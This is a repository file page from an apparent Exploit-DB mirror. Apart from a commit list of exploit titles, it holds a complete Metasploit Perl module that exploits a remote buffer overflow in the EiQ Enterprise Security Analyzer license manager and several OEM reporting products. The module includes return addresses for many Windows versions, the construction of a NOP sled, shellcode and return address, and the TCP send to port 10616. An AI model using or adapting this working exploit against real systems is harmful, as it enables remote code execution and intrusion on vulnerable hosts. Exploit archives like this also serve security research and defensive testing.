bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/windows/remote/2140.pm
Offensive Security 477bcbdcc0 DB: 2016-03-17 
5 new exploits

phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit
phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities

My Book World Edition NAS Multiple Vulnerability
My Book World Edition NAS - Multiple Vulnerabilities

Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL
Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities

cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability
cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities

DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php)
DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities

Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability
Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities

N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability
N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities

New-CMS - Multiple Vulnerability
New-CMS - Multiple Vulnerabilities

Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability
Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities

JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability
JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities

i-Gallery - Multiple Vulnerability
i-Gallery - Multiple Vulnerabilities

My Kazaam Notes Management System Multiple Vulnerability
My Kazaam Notes Management System - Multiple Vulnerabilities

Omnidocs - Multiple Vulnerability
Omnidocs - Multiple Vulnerabilities

Web Cookbook Multiple Vulnerability
Web Cookbook - Multiple Vulnerabilities

KikChat - (LFI/RCE) Multiple Vulnerability
KikChat - (LFI/RCE) Multiple Vulnerabilities

Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability
Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability

xEpan 1.0.4 - Multiple Vulnerability
xEpan 1.0.4 - Multiple Vulnerabilities
AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection
Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow
Cisco UCS Manager 2.1(1b) - Shellshock Exploit
OpenSSH <= 7.2p1 - xauth Injection
FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
2016-03-17 07:07:56 +00:00

106 lines
4.5 KiB
Perl
Executable file
Raw Blame History

#!/usr/bin/perl -w
package Msf::Exploit::EiQ_License;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };
my $info =
{
'Name' => 'EIQ License Manager Overflow',
'Authors' => [ 'ri0t ri0t@ri0tnet.net KF kf_list@digitalmunition.com' ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'win2000', 'winxp' ],
'Priv' => 0,
'AutoOpts' => { 'EXITFUNC' => 'seh' },
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 10616],
},
'Payload' =>
{
'Space' => 494,
'BadChars' => "\x00\x0a\x0d\x40\x26",
},
'Description' => Pex::Text::Freeform(qq{
This module Exploits a buffer overflow in the LICENCE_MANAGER field of
EiQ networks Enterprise Security Analyzer. This bug was found by Titon
of Bastard Labs.
}),
'Refs' =>
[
['OSVDB', '27526'],
],
'DefaultTarget' => 1,
'Targets' =>
[
['EiQ Enterprise Security Analyzer Buffer size 494 Windows 2000 SP0-SP4 English', 0x750316e2, 494 ], # call ebx
['EiQ Enterprise Security Analyzer Buffer size 494 Windows XP English SP1/SP2', 0x77db64dc, 494 ], # jmp ebx
['EiQ Enterprise Security Analyzer Buffer size 494 Windwos Server 2003 SP0/SP1', 0x77d16764, 494 ], # jmp EBX
['Astaro Report Manager (OEM) Buffer size 1262 Windows 2000 SP0-SP4 English', 0x750316e2, 1262 ],
['Astaro Report Manager (OEM) Buffer size 1262 Windows XP English SP1/SP2', 0x77db64dc, 1262 ],
['Astaro Report Manager (OEM) Buffer size 1262 Windows Server 2003 English SP0/SP1', 0x77d16764, 1262 ],
['Fortinet FortiReporter (OEM) Buffer size 1262 Windows 2000 SP0-SP4 English', 0x750316e2, 1262 ],
['Fortinet FortiReporter (OEM) Buffer size 1262 Windows XP English SP1/SP2', 0x77db64dc, 1262 ],
['Fortinet FortiReporter (OEM) Buffer size 1262 Windows Server 2003 English SP0/SP1', 0x77d16764, 1262 ],
['iPolicy Security Reporter (OEM) Buffer size 1262 Windows 2000 SP0-SP4 English', 0x750316e2, 1262 ],
['iPolicy Security Reporter (OEM) Buffer size 1262 Windows XP English SP1/SP2', 0x77db64dc, 1262 ],
['iPolicy Security Reporter (OEM) Buffer size 1262 Windows Server 2003 English SP0/SP1', 0x77d16764, 1262 ],
['SanMina Viking Multi-Log Manager (OEM) Buffer size 1262 Windows 2000 SP0-SP4 English', 0x750316e2, 1262 ],
['SanMina Viking Multi-Log Manager (OEM) Buffer size 1262 Windows XP English SP1/SP2', 0x77db64dc, 1262 ],
['SanMina Viking Multi-Log Manager (OEM) Buffer size 1262 Windows Server 2003 English SP0/SP1', 0x77d16764, 1262 ],
['Secure Computing G2 Security Reporter (OEM) Buffer size 1262 Windows 2000 SP0-SP4 English', 0x750316e2, 1262 ],
['Secure Computing G2 Security Reporter (OEM) Buffer size 1262 Windows XP English SP1/SP2', 0x77db64dc, 1262 ],
['Secure Computing G2 Security Reporter (OEM) Buffer size 1262 Windows Server 2003 English SP0/SP1', 0x77d16764, 1262 ],
['Top Layer Network Security Analyzer (OEM) Buffer size 1262 Windows 2000 SP0-SP4 English', 0x750316e2, 1262 ],
['Top Layer Network Security Analyzer (OEM) Buffer size 1262 Windows XP English SP1/SP2', 0x77db64dc, 1262 ],
['Top Layer Network Security Analyzer (OEM) Buffer size 1262 Windows Server 2003 English SP0/SP1', 0x77d16764, 1262 ],
],
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $target = $self->Targets->[$target_idx];
my $nopsize = $target->[2];
my $nops = $self->MakeNops($nopsize - length($shellcode));
my $ret = pack("V", $target->[1]);
my $evil = "LICMGR_ADDLICENSE&" . $nops . $shellcode . $ret . "&";
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
);
if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return;
}
$self->PrintLine(sprintf ("[*] Trying ".$target->[0]." using return address 0x%.8x....", $target->[1]));
$s->Send("$evil");
return;
}
# milw0rm.com [2006-08-07]
Reference in a new issue View git blame Copy permalink